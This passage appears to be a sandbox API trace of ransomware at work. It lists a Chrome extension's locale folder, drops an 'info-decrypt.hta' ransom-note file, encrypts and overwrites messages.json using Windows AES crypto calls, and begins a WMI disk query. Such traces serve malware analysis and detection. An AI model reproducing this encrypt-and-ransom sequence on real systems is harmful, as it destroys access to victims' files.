Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca", lpFilePart=0x0) returned 0x89 [0209.923] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\", nBufferLength=0x105, lpBuffer=0x949e528, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\", lpFilePart=0x0) returned 0x8a [0209.923] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*", lpFindFileData=0x949e774 | out: lpFindFileData=0x949e774*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fc10 [0209.923] FindNextFileW (in: hFindFile=0xb7fc10, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.924] FindNextFileW (in: hFindFile=0xb7fc10, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0209.924] FindNextFileW (in: hFindFile=0xb7fc10, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0209.924] FindClose (in: hFindFile=0xb7fc10 | out: hFindFile=0xb7fc10) returned 1 [0209.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea0c) returned 1 [0209.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea18) returned 1 [0209.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea4c) returned 1 [0209.924] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca", nBufferLength=0x105, lpBuffer=0x949e554, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca", lpFilePart=0x0) returned 0x89 [0209.924] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\", nBufferLength=0x105, lpBuffer=0x949e528, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\", lpFilePart=0x0) returned 0x8a [0209.924] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\*", lpFindFileData=0x949e774 | out: lpFindFileData=0x949e774*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fc10 [0209.925] FindNextFileW (in: hFindFile=0xb7fc10, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bb530, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x857bb530, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.925] FindNextFileW (in: hFindFile=0xb7fc10, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0209.925] FindNextFileW (in: hFindFile=0xb7fc10, lpFindFileData=0x949e784 | out: lpFindFileData=0x949e784*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0209.925] FindClose (in: hFindFile=0xb7fc10 | out: hFindFile=0xb7fc10) returned 1 [0209.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea0c) returned 1 [0209.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea18) returned 1 [0209.926] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json", lpFilePart=0x0) returned 0x97 [0209.926] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\info-decrypt.hta", lpFilePart=0x0) returned 0x9a [0209.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e928) returned 1 [0209.926] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949e9a4 | out: lpFileInformation=0x949e9a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0209.926] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e924) returned 1 [0209.926] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json", lpFilePart=0x0) returned 0x97 [0209.926] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e368, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\info-decrypt.hta", lpFilePart=0x0) returned 0x9a [0209.926] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e85c) returned 1 [0209.926] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0209.928] GetFileType (hFile=0x31c) returned 0x1 [0209.928] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e858) returned 1 [0209.928] GetFileType (hFile=0x31c) returned 0x1 [0209.928] WriteFile (in: hFile=0x31c, lpBuffer=0x367dd7c*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949e920, lpOverlapped=0x0 | out: lpBuffer=0x367dd7c*, lpNumberOfBytesWritten=0x949e920*=0x1000, lpOverlapped=0x0) returned 1 [0209.929] WriteFile (in: hFile=0x31c, lpBuffer=0x367dd7c*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949e8f4, lpOverlapped=0x0 | out: lpBuffer=0x367dd7c*, lpNumberOfBytesWritten=0x949e8f4*=0x55e, lpOverlapped=0x0) returned 1 [0209.930] CloseHandle (hObject=0x31c) returned 1 [0209.930] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json", nBufferLength=0x105, lpBuffer=0x949e4c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json", lpFilePart=0x0) returned 0x97 [0209.930] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e974) returned 1 [0209.930] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), fInfoLevelId=0x0, lpFileInformation=0x367ed98 | out: lpFileInformation=0x367ed98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857bb530, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x857bc4d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0)) returned 1 [0209.930] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e970) returned 1 [0209.931] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json", nBufferLength=0x105, lpBuffer=0x949e3b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json", lpFilePart=0x0) returned 0x97 [0209.931] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e8a8) returned 1 [0209.931] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0209.931] GetFileType (hFile=0x31c) returned 0x1 [0209.932] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e8a4) returned 1 [0209.932] GetFileType (hFile=0x31c) returned 0x1 [0209.932] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x949e9b0 | out: lpFileSizeHigh=0x949e9b0*=0x0) returned 0xe0 [0209.932] ReadFile (in: hFile=0x31c, lpBuffer=0x367f1dc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949e95c, lpOverlapped=0x0 | out: lpBuffer=0x367f1dc*, lpNumberOfBytesRead=0x949e95c*=0xe0, lpOverlapped=0x0) returned 1 [0209.933] CloseHandle (hObject=0x31c) returned 1 [0209.933] CryptAcquireContextW (in: phProv=0x949e8fc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949e8fc*=0xbdf9d0) returned 1 [0209.934] CryptGenRandom (in: hProv=0xbdf9d0, dwLen=0x10, pbBuffer=0x36808a0 | out: pbBuffer=0x36808a0) returned 1 [0210.309] CryptImportKey (in: hProv=0xbdf9d0, pbData=0x378ddfc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949e8cc | out: phKey=0x949e8cc*=0xb7f490) returned 1 [0210.309] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0210.309] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0210.309] CryptDuplicateKey (in: hKey=0xb7f490, pdwReserved=0x0, dwFlags=0x0, phKey=0x949e8bc | out: phKey=0x949e8bc*=0xb7fc90) returned 1 [0210.309] CryptContextAddRef (hProv=0xbdf9d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0210.309] CryptSetKeyParam (hKey=0xb7fc90, dwParam=0x4, pbData=0x378dedc*=0x1, dwFlags=0x0) returned 1 [0210.309] CryptSetKeyParam (hKey=0xb7fc90, dwParam=0x1, pbData=0x378dea8, dwFlags=0x0) returned 1 [0210.309] CryptEncrypt (in: hKey=0xb7fc90, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x378deec*, pdwDataLen=0x949e928*=0xf0, dwBufLen=0xf0 | out: pbData=0x378deec*, pdwDataLen=0x949e928*=0xf0) returned 1 [0210.309] CryptEncrypt (in: hKey=0xb7fc90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x378e000*, pdwDataLen=0x949e930*=0x0, dwBufLen=0x10 | out: pbData=0x378e000*, pdwDataLen=0x949e930*=0x10) returned 1 [0210.311] CryptDestroyKey (hKey=0xb7f490) returned 1 [0210.311] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0210.311] CryptReleaseContext (hProv=0xbdf9d0, dwFlags=0x0) returned 1 [0210.311] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json", nBufferLength=0x105, lpBuffer=0x949e3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json", lpFilePart=0x0) returned 0x97 [0210.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e894) returned 1 [0210.311] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0210.313] GetFileType (hFile=0x31c) returned 0x1 [0210.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e890) returned 1 [0210.313] GetFileType (hFile=0x31c) returned 0x1 [0210.313] WriteFile (in: hFile=0x31c, lpBuffer=0x378e6c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x949e924, lpOverlapped=0x0 | out: lpBuffer=0x378e6c8*, lpNumberOfBytesWritten=0x949e924*=0x20, lpOverlapped=0x0) returned 1 [0210.315] CloseHandle (hObject=0x31c) returned 1 [0210.316] CoTaskMemAlloc (cb=0x20c) returned 0x66cdfc8 [0210.316] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x66cdfc8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0210.316] CoTaskMemFree (pv=0x66cdfc8) [0210.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x949e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0210.316] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e8d0 | out: ppv=0x949e8d0*=0xb51e34) returned 0x0 [0210.316] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x949e8c8 | out: pAptType=0x949e8c8*=1) returned 0x0 [0210.317] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x949e8cc | out: ppvObject=0x949e8cc*=0x0) returned 0x80004002 [0210.317] IUnknown:Release (This=0xb51e34) returned 0x1 [0210.318] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x949e238 | out: ppv=0x949e238*=0x60271c0) returned 0x0 [0210.318] WbemDefPath:IUnknown:QueryInterface (in: This=0x60271c0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e450 | out: ppvObject=0x949e450*=0x0) returned 0x80004002 [0210.318] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60271c0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e464 | out: ppvObject=0x949e464*=0x6031120) returned 0x0 [0210.318] WbemDefPath:IUnknown:Release (This=0x60271c0) returned 0x0 [0210.318] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e084 | out: ppvObject=0x949e084*=0x6031120) returned 0x0 [0210.318] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e040 | out: ppvObject=0x949e040*=0x0) returned 0x80004002 [0210.318] WbemDefPath:IUnknown:AddRef (This=0x6031120) returned 0x3 [0210.318] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949d99c | out: ppvObject=0x949d99c*=0x0) returned 0x80004002 [0210.318] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949d94c | out: ppvObject=0x949d94c*=0x0) returned 0x80004002 [0210.318] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949d958 | out: ppvObject=0x949d958*=0x66ccaa8) returned 0x0 [0210.319] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccaa8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949d960 | out: pCid=0x949d960*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0210.319] WbemDefPath:IUnknown:Release (This=0x66ccaa8) returned 0x3 [0210.319] CoGetContextToken (in: pToken=0x949d9b8 | out: pToken=0x949d9b8) returned 0x0 [0210.319] CoGetContextToken (in: pToken=0x949ddc0 | out: pToken=0x949ddc0) returned 0x0 [0210.319] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949de50 | out: ppvObject=0x949de50*=0x0) returned 0x80004002 [0210.319] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x2 [0210.319] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x1 [0210.319] CoGetContextToken (in: pToken=0x949e748 | out: pToken=0x949e748) returned 0x0 [0210.319] CoGetContextToken (in: pToken=0x949e6a8 | out: pToken=0x949e6a8) returned 0x0 [0210.319] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x949e778*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x949e774 | out: ppvObject=0x949e774*=0x6031120) returned 0x0 [0210.319] WbemDefPath:IUnknown:AddRef (This=0x6031120) returned 0x3 [0210.319] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x2 [0210.319] WbemDefPath:IWbemPath:SetText (This=0x6031120, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0210.319] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x949e8fc | out: puCount=0x949e8fc*=0x0) returned 0x0 [0210.319] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x949e8f8*=0x0, pszText=0x0 | out: puBuffLength=0x949e8f8*=0x20, pszText=0x0) returned 0x0 [0210.319] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x949e8f8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949e8f8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0210.319] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031120, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0210.319] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x949e8fc | out: puCount=0x949e8fc*=0x0) returned 0x0 [0210.319] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031120, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0210.319] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031120, uRequestedInfo=0x0, puResponse=0x949e904 | out: puResponse=0x949e904*=0xc19) returned 0x0 [0210.319] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x949e87c | out: puCount=0x949e87c*=0x0) returned 0x0 [0210.319] 